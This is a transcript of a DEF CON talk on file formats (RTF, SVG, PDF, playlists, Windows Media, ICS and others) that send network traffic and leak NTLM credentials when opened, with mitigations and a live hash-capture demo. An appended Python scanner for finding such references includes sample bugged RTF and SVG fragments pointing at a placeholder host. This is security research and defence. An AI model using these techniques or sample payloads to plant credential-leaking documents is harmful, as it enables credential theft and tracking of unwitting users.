Welcome. Welcome to DEF CON 23. I hope you all have as much fun as I generally have. So to start off, this is the talk Bugged Files. If you're here for some other talk, then you're in the wrong room. Let's start out by introducing ourselves. My name is Damon Smith. I am a security engineer with NCC Group. I work alongside this handsome man. Traditionally, I focus mainly on web applications and network-level security and embedded devices. But recently I've begun doing file format research with this man right here. And this man right here is Daniel Crowley, as aforementioned, handsome. Thank you. I like web applications and crypto and fiddling with file formats. So this is right up my alley, which you would hope, because I'm up on stage talking to you about all of this. So yeah. Just so you know, we're from Austin, Texas. Anybody? Yay. And there's this local meetup there called Austin Hackers Anonymous, AHA. And heckling is a time-honored tradition there. So if you have something funny, feel free to shout it out. But only if you're funny. If you're not funny, please just stay silent.

So let's begin. So what is this talk about? This talk is about abusing features of file formats to make files that trigger outbound traffic when opened. And there are some caveats to this. We focused our research in particular directions, because if we were to stand up here and say, "Ah, I can make an executable that calls out when you open it," well, yeah. Okay. So it's slightly more interesting things like document formats, media formats, that sort of thing. And the important thing to keep in mind here is that none of this is exploitation. Well, it's sort of exploitation. But it's not exploiting any sort of bug, right? These are not mistakes the way usual vulnerabilities are. We're talking about features in file formats, features in parsers, that allow for this sort of thing to happen. All right. So why do you care? Why are you in this room?
We have broken it down into three main reasons that this stuff is important. The first and most obvious is privacy. There are a lot of obvious privacy implications. There are also some more hidden privacy implications. We're going to go over each one of these points in detail during the talk. But just briefly, we're talking DRM: files that phone home as soon as you open them, for tracking their use. Data loss prevention: files that exist on a corporate network that, as soon as they're opened outside of the corporate network, phone home to let someone know that they've been breached. De-anonymization. Additionally, there are some real security implications to this that we're going to go over a bit more in depth later. We have files that, as soon as you open them, will send NTLM credentials to an attacker. Finally, as Dan mentioned, all of these things are features. They're not bugs. They're not buffer overflows. They're not going to be fixed on Patch Tuesday. These are going to be around for years. They're going to keep working. So that's what makes these bugs different than your standard buffer overflow type bugs.

So we're going to start out with a little demonstration. I'm sure a lot of people, they heard, like, "Oh, credentials. Credentials. Let's see it." So we're going to show you two demonstrations now. One with RTF and one with SVG. Quick prayer to the demo gods, please. Did you bring the live chicken? Does anybody have a live chicken? I've got the ceremonial dagger, but okay. Well, we'll just have to hope for the best. So I guess I'll tell you what he's doing while he's doing it, since he can't hold his microphone and use his computer at the same time. I know, I know. You see in front of you a standard Windows image. Windows 8.1, fully patched, fully up to date. Nothing up my sleeve, nothing up my sleeve at all. What you don't see is the Kali image that is running in the background on this machine that's going to be capturing credentials. If we're lucky.
Come on, pray harder, demo gods. This doesn't look good. It's hard drive activity. Something's wrong with your disk. I guess this is the failure of putting demos at the beginning of your talk instead of the end. Oh, yeah, great. It's moving. It's working. That's good. Here we have a completely normal document. I'm just muttering to myself. Don't listen to me. You may be at the wrong talk. See, that's funny. Do that. See, don't do that. That wasn't funny. Be meaner. Come on. Credit where credit is due. Thank you. Thank you. He's available for parties, bar mitzvahs, weddings. Yeah, working on it, pal. I swear it worked five minutes ago. This is why all the jokes about demo gods. No virus protection. This is how we roll at DEF CON. Am I right? We are waiting to enter the password into the Kali Linux machine. You know what? This is not going well. So let's try this towards the end. We will revisit the demos later. Back to the presentation. All right. So, thank you. Not the best demo you'll see at DEF CON this year. We'll try again later on. Hopefully it'll work later once it's finished thinking about it.

So there are already a number of formats that are known to allow this. There's been some research into Office document formats. There are playlist files. There are shortcut files. That's an interesting vector, because as soon as you open up a folder with one of these files in it, it triggers this interaction. Interestingly, HTML, yeah, it's obvious that you can do remote references with this and call out. That's kind of the whole point. Yes. Hypertext. Not like calm, uncaffeinated text. But you can also do NTLM references, which work in certain browsers, namely Internet Explorer. So in Internet Explorer you can actually do, like, img src equals an SMB URL, and that's actually the trigger: when Windows tries to do SMB communication.
If that SMB service asks for NTLM authentication, Windows will take your current cached credentials, so whoever you're currently logged in as, and attempt to do NTLM authentication using those credentials. Interestingly, also, if you receive an HTML-formatted email through Outlook and it has images which do the same sort of thing, reference an SMB share, this will trigger the interaction as well. So that's what's been done in the past.

Let's talk a little bit about what our research focused on. We were specifically targeting your average corporate Windows build. So, things that your average user in a corporate environment is used to opening as email attachments. These are document formats. These are media formats like images or audio or video and stuff like that. Additionally, we also looked at groupware stuff, like Outlook stuff, so meeting invitations, contact cards. We wanted formats that the average corporate user is used to receiving in their inbox every day and double-clicking without thinking. So just a quick note here. Up at the top, you'll see, like, R | N. So this is some quick notation so you know that this particular format supports ordinary remote references at all, but additionally NTLM credential capture or relay stuff. So PDF supports both. Just a quick note.

So PDF, there are a couple of different ways that we found. You can actually embed remote images into PDFs, which is, like, well, interesting. Okay. Great. PDF is a very interesting format. The 1.3 specification is some, like, 300, 400 pages long. So it's a wonderful read if you are, like, having trouble sleeping on the plane. So anyway, so remote images. This is one of the simplest ones. So you just embed a remote image in a PDF and it'll call out when you open it, because it has to try to load that image, of course. There's also JavaScript support in PDF. Anybody out there who didn't know that PDF supports JavaScript? You're all very educated on the PDF format. You're probably in the right talk. Good.
So you can pop open a media player using JavaScript with app.media.openPlayer, and this supports SMB URLs. That's not technically... UNC paths. And the same thing with getURL, which is another sort of PDF-specific JavaScript function. One really funny thing. Actually, Damon, I'll let you talk about the warning here. So it does issue a warning as soon as you embed one of these SMB URLs in your document. It says, "You're trying to connect to hostname attacker.com. Do you want to allow this?" What's funny, if you're familiar with UNC, you might be familiar with long-form UNC. A traditional UNC path is \\hostname\sharename\file. Long-form UNC is \\?\hostname\sharename\file. I don't know why it exists, but it does. And as you can see from this cute little error message, it actually says, "This document is trying to connect to home. Do you want to allow this?" So yes, it's still a warning message. And it's kind of funny that we can make it kind of an obscure and bizarre warning message. But yeah, I can't tell if this is more or less shady than, like, "Would you like to connect to completely-legitimate-site.com?" But, you know, there you have it.

So the next file format that we got a quick win on was the RTF format. This is one that you will hopefully see a demonstration of later in our talk. This slide would make much more sense if you had already seen the demonstration. But anyways, the technique that's used for RTF: you are allowed to embed links to remote documents in an RTF file. I don't know why that's the case, but it exists. So the cool thing about the RTF proof of concept that we cooked up is that it works in both Word and WordPad. So it doesn't matter if they have Office installed or not; if they open this RTF file, I'm going to get their NTLM credentials. Even more hilariously, it does issue a warning saying, "This document has links to remote content. Do you want to allow this?"
But the funny part, and the part that you'll hopefully see in our demo in a minute, is that it has already sent your credentials before it shows the warning. So not the most useful warning in the world, but hey, what are you going to do?

So there is an image format called SVG, Scalable Vector Graphics. And in contrast to traditional image formats, where you have just, you know, a bunch of data about the dimensions of the image and then the raw color data encoded into some format, SVG is actually a sort of a series of instructions for how to build the image. Kind of like how HTML is, like, a series of instructions for, like, what to put where. SVG is kind of similar. And what's interesting about SVG is that it looks a lot like HTML. It's an XML-based format. And it actually supports a subset of HTML and some of that. So you can actually have remote style sheets. So you can import a cascading style sheet from a remote location. And there's also support for JavaScript in SVG, which is fucking hilarious as well. Your images have JavaScript in them. Welcome to the future. So SVG, you can use a UNC path, or rather a file URL, which basically is, you know, when you're referencing a remote host file path, Windows is going to use SMB, right? So SVG, we can use that as well.

So the next one, M3U, PLS, basically all of the playlist formats. The core goal of these formats is to have a list of media files that will be played in sequential order. So obviously these are going to be able to make remote references. What is perhaps less obvious, and maybe not such a great idea, is that they're allowed to reference UNC paths. I know for a fact that I've never had a playlist that needed a legitimate reference to a UNC path. I can't imagine why that's a feature. But it is. So you open our little playlist and we get your credentials. So that's kind of cool. It's worth mentioning at this... you have a question, sir? So the question is, is two-factor authentication a reasonable mitigation against this?
My response is that it's far too complicated. This is a much simpler problem. Yes, you should do two-factor authentication, 100 percent. Absolutely you should do that. But this is a much lower-level problem than that. It should not be the case that when you open a file format, it is allowed to send your credentials to a remote party. That should never happen. Especially without your interaction.

So it's worth mentioning at this point that the handling of UNC paths is sort of done, I'll get to you in just a moment, sir, I promise, it's done at a different level than you might imagine. So the parser that's working with an M3U or a PLS or something like that on Windows, it's expecting either a URL or a file path. Now, if you give it something that isn't a URL, it doesn't start with, like, "http:" slash whatever, it's going to just say, "Hey, Windows, you handle this," right? So in many places where you're calling out to some file path, where you're consuming a file path and then pulling the file from the file system, Windows is actually handling this and goes, "Oh, this is a UNC path. I know what to do with this." So that's what enabled us to do a lot of these things, and I'm just kind of mentioning this at a random point, I know, but Windows is actually going to handle this and not the parser. So the fact that a lot of these support UNC paths is not so odd when you understand that.

Now, we had a question. That is an excellent question. The question is, other than the default parsers that we have shown, are other parsers also vulnerable? My answer is, we don't know. We didn't check. We did look into it, but it wasn't our primary focus. Our core focus was your stock corporate build, which is going to have Adobe Reader and it's going to have probably Internet Explorer as the default browser, let's be honest. What I can tell you, sorry, go ahead. What I can tell you is that for PDF specifically, we did look into that more than any other format.
I can tell you that most PDF readers out there support only a small subset of the full PDF functionality because, as I mentioned, it's flipping huge. Absolutely huge. Crazy things in there. Great. I mean, like, we could do an entire talk just about PDF. If you're interested in PDF and all its weirdnesses, I can recommend OMG WTF PDF by Julia Wolf. Great talk. So, great talk if you want to look more into PDF. But Chrome's PDF reader, which is, like, I think it's just PDF.js, which is, like, Firefox's, Mozilla's, like, JavaScript-based PDF renderer. It doesn't support a wide range of things. So none of these techniques work on Firefox's built-in PDF reader, Chrome's built-in PDF reader, Preview.app. It's pretty much just Adobe Reader and Adobe products that will, like, do the whole set of functionality. So these, the techniques that we mentioned for PDF, work on Adobe Reader and that's what we've tested it on. So, good question. You take this one.

Okay. So the next family of formats that we looked at is the ASF family of formats, which maybe you've never heard of. But some of the implementations of ASF include Windows Media Audio, Windows Media Video, or your classic ASF file. I know it may shock you, but your Windows Media Video file has the ability to fetch from a URL when you open it, which is incredibly bizarre. I can't imagine why this functionality exists. You play a video file and it goes and retrieves information from a remote... it actually pops open your web browser to a remote URL, which is completely insane. And since on the average corporate build the default browser is going to be Internet Explorer, and Internet Explorer has the ability to fetch images from an SMB path, what this means is you open our video file and it sends us your NTLM credentials. The particular technique here is called URLANDEXIT. Basically, you're allowed to embed scripts that are executed at a certain point in the video file.
So, for instance, five seconds into the video file, run this script. Traditionally, this is used for including closed captioning information in a video file. But with this URLANDEXIT command, it opens a URL in the default browser and then stops playback of the media. So you can see how this might be applicable to a bunch of different things. And even if your default browser isn't IE, if it pops open, like, riaa.org/iamapirate.html, you can see where I'm going with this. But yeah, it's kind of odd.

So MP3 is both a loss and a win. So MP3 by itself is a very simple format. You have, like, a fixed-size block of data which defines, like, here's what the next block of audio is going to need to be rendered like. And this is what allows for things like variable bit rate, because you can say this block I want this bit rate, and this next block I want this other bit rate. So it's just block of metadata, audio data, block of metadata, block of audio data. There is an extension which is not actually part of MP3, but sort of de facto has become a part of the MP3 standard, which is ID3. It's a tagging format which is just sort of tacked on to MP3 in a modern context. So we looked into ID3 and there's some interesting stuff in there. And there's a frame that says, hey, the frame that's supposed to go here is actually in this remote location. And then there's also the attached picture frame, which is, like, if you open up Windows Explorer and you see, like, various pictures of album art or whatever when you look at an MP3, that's because there's an embedded picture in the MP3 file in the ID3 tag. So that actually supports remote pictures as well. Unfortunately, with every player we tried, and we tried a lot of them, these features don't work. So one of the things we learned throughout this is that, like, what the RFC says and what the player, the parser, actually supports are two different things. We did find some interesting things while reading through the ID3 spec, though.
You might be wondering why there is a brightly colored fish as a picture for this slide. It doesn't really seem to make sense. Well, that's because in the APIC frame you can say what type of picture is actually being attached to the MP3 in the ID3 tag. And there's, like, a number that says, like, what kind of picture. And number 13 is a brightly colored fish. Why? I have no idea. Another fun fact: Primus is its own genre in ID3. So there you have it. So at least reading the RFC wasn't a complete waste, because I had a good laugh or two. I mean, everybody knows, but that, come on, be nice. That's hateful. So yeah, but the fun thing is, if you take something like a WMA file and just rename it to an MP3 and Windows Media Player consumes it, it's like, "Oh, this is a WMA. It's just named an MP3. Yeah, okay. You want me to pop up a URL? All right, sure, here you go." Sort of a win, sort of a loss, you know.

So the next one we looked at, that is kind of obvious actually, is torrent files. The whole point of these files is to embed a list of trackers from which you can obtain peers to download a file, right? So you would think, oh, of course it's going to make remote references. But what we found that's a little bit more interesting is: what are the implications of a torrent file that makes arbitrary remote requests? So we are in the process of creating the one torrent file to rule them all, which is basically one torrent file that has a list of every known cross-site request forgery vulnerability in your standard home router, that will go through these URLs one after the other trying to pop a shell on your router as soon as you open this torrent file. So even though it's kind of obvious that torrent files are meant to embed remote references, when you consider the implications, like cross-site request forgery, they become much more interesting.
This is not so bad, though, because people don't generally open torrents and then just leave them running on their computer for hours or days. So I mean, it's not that bad. But yeah. We found an interesting thing as well. There's support for URL seeds, so you can have, like, an FTP server or an HTTP server to serve as an alternate seed in case the swarm doesn't have, in case there are no peers or seeds active. But we weren't able to find any clients that supported this, so that's unfortunate.

Next we have the vCard format. So this is kind of like a contact card, a virtual contact card, where you send somebody the virtual equivalent of a business card and then they have, you know, a picture of you and your email address and your phone number and full name and all this wonderful stuff. One of the interesting things that's in there is a free/busy URL. So it's a URL that your mail user agent can check, or rather your calendar user agent can check, to see when this person is free or busy. And normally this is specified as an HTTP URL, but as it turns out you can use a UNC path. So this does require specific actions. If you were to be exploited by me using this, you would need to receive my contact card, import it, and then try to, like, see when I'm free or busy, because that's when the interaction actually triggers. But, you know, any of you who have done any social engineering, this is not necessarily a hard thing to do. Like, "Hey, you know, I need to have this meeting with you, please, you know, find some availability and, you know, here's my contact card," whatever.

So the next format we looked at is the iCalendar format, ICS. This is the standard when you receive an email that says, "I want to schedule a meeting with you." There's a decent chance that the attached file is actually an ICS file. This is another really sad instance of people not following the RFC.
Through this research we basically discovered the three essential steps to building a parser. Step one, read the entire RFC. Step two, forget everything you just read. Step three, light the RFC on fire. Then write your parser however the hell you want. So reading the ICS file specification, we found some very interesting and very scary items that are included. You are allowed to set an alarm, as you're probably all familiar with when you set up a meeting. I want to be reminded 30 minutes before, I want to be reminded two days before, whatever. These alarms have certain actions attached to them. So 30 minutes before the meeting I want an email to be sent to me. 30 minutes before the meeting I want a little noise to play from my cell phone. Those are the different options that are available in the alarm category. One option that is actually kind of terrifying is called PROCEDURE, which means run this program with these command-line arguments 30 minutes before the meeting. I don't know why that would ever have a legitimate use case. I don't know why that's in the format, but to put you all at ease, none of the calendar agents that we tested actually support that. So you're not going to have calendar agents opening programs 30 minutes before a meeting. Nothing crazy like that. I'm kind of sad, but I'm also kind of relieved, like, at least it's not that broken. They got this one right. Yeah, well, you know. All right, but I'll tell you what it's great for: trolling, because you can define as many alarms as you want and it's defined by the calendar invite itself. So if you want to say, like, yeah, let's have a meeting in 30 minutes, and every single minute from now until then pop up an alert and, you know, play an alarm sound, like... I haven't done that yet, but that's coming.

So obviously there are a bunch of different ways that you could deliver these documents. Obviously via email. You could do this by distributing these on some open file share.
You might have, you know, let's say that you compromise some site that you know a target is going to be on. You might replace a document with a bugged version. P2P distribution, that's a pretty obvious vector for this sort of thing. And then we have honeypots. So this is one of the more interesting things we thought of as uses for this. So let's say that you wanted to see if somebody had gotten into your company's trove of, you know, documents. You might bug one of them. Like, put a bugged file in there, like, you know, something juicy like salaries 2016.pdf or some such. And then you know that that file has no legitimate usage. It doesn't actually contain anything, but when somebody, you know, opens it, they're not supposed to do that, and you get a notification about that. So that's actually kind of an interesting, you know, blue-teamy sort of use for this. Yeah, like a honey document.

All right, so we've talked a little bit about what we're able to do. Now let's talk a little bit about how we think this could be applied. One of the more worrying potential uses for this is a dystopian-future DRM where every time you open this document it calls home. This is a little bit more troubling than your standard DRM, whose only purpose is to prevent you from playing or viewing a document when you don't have a legitimate need for it. This goes beyond deterrence into identification. Not only do they prevent you from opening the file, but they know who you are; they know that you tried to open it. So this is kind of scary stuff. And you're able to do this today. Nothing is stopping this from happening today. So there's sort of another side to the data loss prevention. There's sort of, like, the honey document idea, but there's also the fact that, let's say that you're trying to, you know, be a whistleblower. You're trying to leak some important information. What you feel is information that should be public knowledge because of some wrongdoing.
But you get, you know, like, some important document that's been bugged. And then, you know, all of a sudden, you know, the people who own this document, who have bugged this document, see it opened from your work computer, then your home computer, and then, you know, wherever you shared it, you know, all of a sudden this is known to this party, this bugging party, and you get disappeared. So that's a little bit scary.

So one of the most obvious implications of this: de-anonymization. If you've ever used the Tor Browser Bundle, which, don't admit it, because you don't want people to know that you use it, that defeats the point. But anyways, if you've ever used it and you've ever downloaded a file through the Tor Browser Bundle, it'll pop up this cool little warning message that says, "Hey, we're going to parse this file in an external application. There is a chance that this external application will unmask you, because it might not go through Tor. You should be very careful opening this file." This research is the reason that warning exists. Take that warning seriously. If you are opening files, they can track you even if you're using the Tor Browser Bundle. I think you're a little bit safer if you're using the Tails live CD, because it routes all traffic through Tor. I don't know. I'm not an expert, don't listen to me. Don't open files. Yeah, we actually don't want to talk. We're just going to leave now. Yeah, yeah. Drops mic. Additionally, maybe you are working for a government agency. You do not own or control the jihadist wiki. You are not an administrator on the site. But you do have the ability to, for instance, upload a PDF file called "How to Make a Bomb in Three Easy Steps." And then everyone that opens that file, you know this person is interested in making a bomb in three easy steps. So you've de-anonymized that person. We've sort of beaten this one to death already. Like, we've mentioned this a billion times at least, and, you know, definitely not exaggerating there.
But NTLM credential capture and relay. So I've already discussed all this, so this is sort of in here for posterity, but I'm going to move on since we have limited time and I really want to try to get that demo to work. But for those of you who are not aware of how NTLM relaying works, I'm going to go over it really quickly. So there's obviously the fact that if I get your NTLM hash I can crack it, but what if you have a strong password? So this is the way it normally works. I say, "Hey, server, I want to negotiate, I want to access whatever it is you've got, whatever your sweet, sweet goods are, I want them." And the server says, "Ah, well, first, here's a number, mix it in with your hash and then send that back to me." And so once that happens, you're authenticated. But if you can get somebody to try to authenticate to you, there's actually no, like, authentication. I mean, there's client authentication, but there's no server authentication. Like, there's nothing about the communication that ties the communication to a particular server, just to the client. The server doesn't have to authenticate itself. So if I get a connection from you, I then pass that along to the server and pass the information back and forth, and I never have to learn the password. I just have to get you to go through the steps and give me access, at which point I tell you, "Sorry, no, that didn't work, would you like to try again?" and then I pass it to a different server. So if I can get you to try to authenticate to me via NTLM, I can authenticate to anybody that takes those credentials, and actually multiple parties. So that's fun.

So something we've already discussed a little bit, but it's worth talking about in further detail: cross-site request forgery. A lot of people are opening these documents from a privileged network position. They're inside your corporate firewall, or they're on your home network, or whatever. This means that the person who crafted the document is able to access these resources in a limited way.
For instance, they could browse to your router /shutdown.html or whatever. They will have the ability to send a cross-site request forgery attack from a privileged network position to a vulnerable device, as I discussed with the torrent file. Sometimes, as we discussed earlier, the parser that will initiate this outbound traffic will actually pop up, in other words, pop open your default browser, and if you have an authenticated session with some site, any site, in that default browser, then it will ride on those credentials. So you have your sort of classic confused deputy attack, your classic CSRF attack there.

So we thought about mitigations. I don't think we should spend too much time on this, but AV is not going to be effective against this, because there are too many different ways to do this, too many formats, and there's a possibility of false positives. It is legitimate functionality to have remote images in PDFs. How legitimate, well, that's a good question, but it is legitimate functionality; it's in the spec. So having a remote image in a document isn't necessarily bad, just like having a one-by-one pixel image that is transparent on an HTML page or in an email that's clearly for tracking purposes, that's legitimate, question mark. So AV is not really an effective defense. You can change the formats, but again, there are way too many formats and people are already, like, using the formats as they are, so, like, you might be killing legitimate functionality by changing the formats. Application-level firewalls are a really good defense, something like Little Snitch for OS X or ZoneAlarm or Leopard Flower for Linux. These are good mitigations against this for some things, so, like, I don't ever want WordPad to be talking to a remote server. I don't ever want that, ever. So if I ever see that pop up in, you know, Little Snitch, I'm going to say, "Fuck no, absolutely not." But for something like M3U, like, yeah, I wanted to connect to, you know, Last.fm or whatever.
So it's not a perfect solution. So a few other mitigations that we considered. Warnings. This is the classic panacea for the information security community. More warnings. So yes, you could have more warnings. We do want to see more parsers that warn their users, "Hey, this document is about to do something that's kind of sketchy. This document is about to send tracking information to a remote party." But as we all in this room are probably aware, every user clicks OK on every warning box ever. It doesn't matter what it says. Like, you get a warning box that says, "Opening this file will set your house on fire," and they will still click OK. So that's why it's not a great mitigation. Additionally, we could do something that actually hooks the lower-level networking libraries. If you've ever used proxychains, it's a pretty cool little tool. It routes all traffic from an application through a proxy by hooking low-level networking libraries. Unfortunately, this isn't perfect either. First off, it's very difficult to set it up. Like, it's kind of annoying. Additionally, it doesn't work on every application. For instance, I think Chrome does not allow the use of proxychains, because it prevents use of LD_PRELOAD, which is how proxychains works, on Linux at least. Additionally, egress filtering. This is something that you should all be doing already. You should all be blocking, for instance, Intel or SMB traffic at your corporate perimeter. If you're not doing that, you're behind the times. You need to catch up. But even egress filtering is not perfect, because yes, you may be able to block SMB traffic, but you can't block HTTP traffic; like, everyone allows port 80 through every firewall ever. So it's still not a perfect solution.

So this is normally the point where we take questions, but I'm going to hold out hope that this demo will work now. Demo gods, please be with us now. Let's give this a shot. See if we can get this to work now.
I guess I can take questions while he's setting up the demo. So we'll do that to save time. Any questions? Yes? Sure. So the question was, what tools are available to see what it's trying to connect to when you open a file? The best ones are going to be your application-level firewalls. So if you're on OS X, you're going to want to install Little Snitch, and when you open this PDF file it's going to say, hey, your PDF reader is trying to connect to a remote host. Do you want to allow that? And I think, what did you call it? The "fuck no, I don't ever want that" button. Click that one. Click the one that says no, never allow this thing to connect to a remote server. That's for OS X's Little Snitch. On Windows it's ZoneAlarm. On Linux it's Leopard Flower.

Any other questions? Yes? So could it be a script? Oh, so the question is, do any of the parsers support fetching something that might be a script or executable code and executing it? Sort of would be my answer. Not directly, but keeping in mind, for instance, the stuff that we saw for the Windows Media Video files: it opens your default browser and goes to a web page. So it's not directly executing code, but it's common knowledge how to exploit Internet Explorer to get code execution. That happens regularly. So, you know, you give a video file that embeds a link to your, you know, Metasploit Browser Autopwn or whatever it's called these days. So it's not directly executing code. We didn't find anything that could do that, but there are paths to code execution.

Any other questions? Over there. Did we look at parsers for mobile platforms, was the question. Unfortunately, we did not research mobile platforms. There's a good chance that a lot of these techniques are going to work on a mobile platform. For instance, if you're using Adobe Reader on your mobile, there's a good chance that the stuff that we found for PDFs is still going to work.
Additionally, it's very common that mobile versions of software are at least a few versions behind their desktop counterparts. So the version of Adobe Reader that you have on your mobile might be out of date, and it might not even show the same warnings that your desktop client does.

Any other questions? Yes. So the question was, can some of these bugs be mitigated through policy settings? The answer to that is: some of them, yes; all of them, no. So I'm not exactly sure which ones can. I'm pretty sure that the Windows Media Video and Windows Media Audio stuff can be affected by Group Policy, but don't quote me on that. So in general, no, Group Policy is not an effective mitigation. That would be my answer.

Any other questions? Yes. Was the question, what am I going to get in a VM environment? Sure. So for the purposes of these techniques that we're showing today, a VM is functionally equivalent to a regular computer. So if you open one of these documents and it triggers SMB traffic, I'm going to get the credentials for that VM. So it doesn't really change when you move to a VM, in general.

Yes. Are you talking about the demo? Sorry. I hate to harp on this, because everyone harps on this, but I think user education is a critical component to fixing this problem. I know that there is a lot of debate about whether user education actually works, but people need to know that this stuff is dangerous. People need to know that opening a file can track you. People need to understand the implications of opening these files. Even if this file doesn't have a memory corruption exploit in it, it can still do bad things to you. I think that's one of the most important things that you can tell your clients. User education: they need to understand that this stuff is dangerous and that this stuff is out there. Everyone opens every file ever. So, technical mitigations beyond user education.
You already mentioned egress filtering, which I think is one of the best that you can apply as a corporate-wide mitigation, but even that obviously isn't perfect. Yikes. Application-level firewalls. I think that's the best answer I can give, and that's not a very good one. I'm sorry.

Any other questions? Yes. As far as I'm aware, no. There's no way to say only auto-authenticate to UNC paths in this particular domain. Oh, the demo is ready, so we'll take a bit more questions after the demo.

All right. So charge. So we've got an RTF file here. I'm just going to open that real quick. And so we've got this warning: hey, this document contains links to other files. Do you want to update? No, I do not. That sounds sketchy. But if I pull this over here, you can see that I've already captured the hashes. So that's fine. It's like closing the gate after the horse has left the barn. Am I right? So that, oh no, I don't think I want to do that actually. Let me not. Let me not do that. So let's go ahead and close this, and then I'm going to open this. Let me just clear my, nothing up my sleeve here. I'm just going to clear the thing so you can see I've got this cleared. I've got this cleared. And I'm going to go ahead and open up this SVG, and see, it doesn't show anything, although we could make it show something. And again, we have captured hashes. And from here I'm just going to go ahead and crack quickly. I've got, like, a crap password here. So just going to run John. So just run it through John quickly. And I made it a really easy password so it would crack instantly and you don't have to wait a long time, but that's a bit too late for that now. Sorry about the wait. The username is throwaway and the password is also throwaway, in case that wasn't obvious. Right. So here we've, again, just to review, this is not an exploit. This is features of Windows. This is features of SVG. This is how it's supposed to work. Yes. And this is what we get. Right.
So just by opening an SVG, an image file, a video file, a document. And this is, like, we don't even have Office installed on this. This worked in WordPad. Right. So all of a sudden, this happened. Right. So thank you for waiting patiently for the demo to work. I'm glad it finally did. We finally did it. Thank you. Thank you very much.
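Added example, not code from the talk or from NCC Group. The audience asked what tools show where a file will try to connect when opened; the speakers pointed at application-level firewalls, which only tell you after the parser has already started reaching out. The scanner below answers the same question statically: it lists the UNC paths and remote URLs embedded in an RTF or SVG file (with a plain-text fallback for formats like M3U) so you know what to expect before double-clicking. The sample RTF and SVG inputs are constructed here; the RTF INCLUDEPICTURE/HYPERLINK fields and the SVG <image> href are an assumed way such references appear, since the exact constructs in the demo files were not shown. The host 10.0.0.5 and the name tracker.example are placeholders.

```python
"""Static scan of a document for references that make a parser reach out to the
network when the file is opened (UNC paths, remote URLs).

Added example, not tooling from the talk. It does not prove that a particular
viewer will follow a reference; it lists the candidates so you know what an
application-level firewall prompt or an egress log should be showing you.
"""
import re
import xml.etree.ElementTree as ET

# UNC path \\host\share\...: on Windows, a parser resolving this may send NTLM
# credentials to "host" before any user-visible prompt appears.
UNC_RE = re.compile(r'\\\\[\w.-]+(?:\\[^\s"\'{}\\<>()]+)+')
# Remote URL schemes worth flagging; "#fragment" and relative references are ignored.
URL_RE = re.compile(r'\b(?:https?|ftp|file|smb)://[^\s"\'<>(){}]+')


def classify(value):
    """Return ('unc', ref) or ('url', ref) for the first remote reference in value, else None."""
    m = UNC_RE.search(value)
    if m:
        return ('unc', m.group(0))
    m = URL_RE.search(value)
    if m:
        return ('url', m.group(0))
    return None


def scan_text(text):
    """Generic scan: every UNC path and remote URL anywhere in a text blob."""
    found = [('unc', m) for m in UNC_RE.findall(text)]
    found += [('url', m) for m in URL_RE.findall(text)]
    return found


def scan_rtf(text):
    # RTF writes a literal backslash as two backslashes, so a UNC path inside a
    # field instruction (INCLUDEPICTURE, HYPERLINK, ...) shows up with every
    # backslash doubled. Collapse those pairs, then scan as plain text.
    return scan_text(text.replace('\\\\', '\\'))


def scan_svg(text):
    """Walk every element and flag any attribute (href, xlink:href, style url(...))
    or <style> body that points off-document."""
    found = []
    root = ET.fromstring(text)
    for el in root.iter():
        for value in el.attrib.values():
            hit = classify(value)
            if hit:
                found.append(hit)
        if el.text and el.tag.endswith('style'):
            hit = classify(el.text)
            if hit:
                found.append(hit)
    return found


def scan_document(data):
    """Dispatch on the leading bytes; return a de-duplicated, ordered list of (kind, ref)."""
    if isinstance(data, bytes):
        data = data.decode('utf-8', errors='replace')
    head = data.lstrip()[:64].lower()
    if head.startswith('{\\rtf'):
        found = scan_rtf(data)
    elif head.startswith('<?xml') or head.startswith('<svg'):
        found = scan_svg(data)
    else:
        found = scan_text(data)
    return list(dict.fromkeys(found))


# Constructed sample inputs (assumed constructs, not the talk's demo files).
SAMPLE_RTF = (
    r'{\rtf1\ansi '
    r'{\field{\*\fldinst{INCLUDEPICTURE "\\\\10.0.0.5\\share\\logo.png" \\d}}{\fldrslt{}}}'
    r'{\field{\*\fldinst{HYPERLINK "http://tracker.example/beacon.gif"}}{\fldrslt{click}}}'
    r' Hello}'
)
SAMPLE_SVG = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="\\\\10.0.0.5\\share\\pixel.png" width="1" height="1"/>
  <image href="https://tracker.example/t.gif" width="1" height="1"/>
  <rect width="10" height="10" style="fill:url(#g)"/>
</svg>"""

if __name__ == '__main__':
    for name, sample in (('rtf', SAMPLE_RTF), ('svg', SAMPLE_SVG)):
        for kind, ref in scan_document(sample):
            print(f'{name}: {kind:3} {ref}')
```

A "unc" finding is the one to treat as credential-leaking on Windows, since the SMB client will authenticate to the named host without asking; a "url" finding is a tracking or CSRF candidate that your egress filtering will not stop on port 80. Run it over an attachment before opening it, or over a mail spool as a cheap pre-filter, and treat an empty result as "nothing obvious" rather than "safe", because the scan covers only references written in the clear.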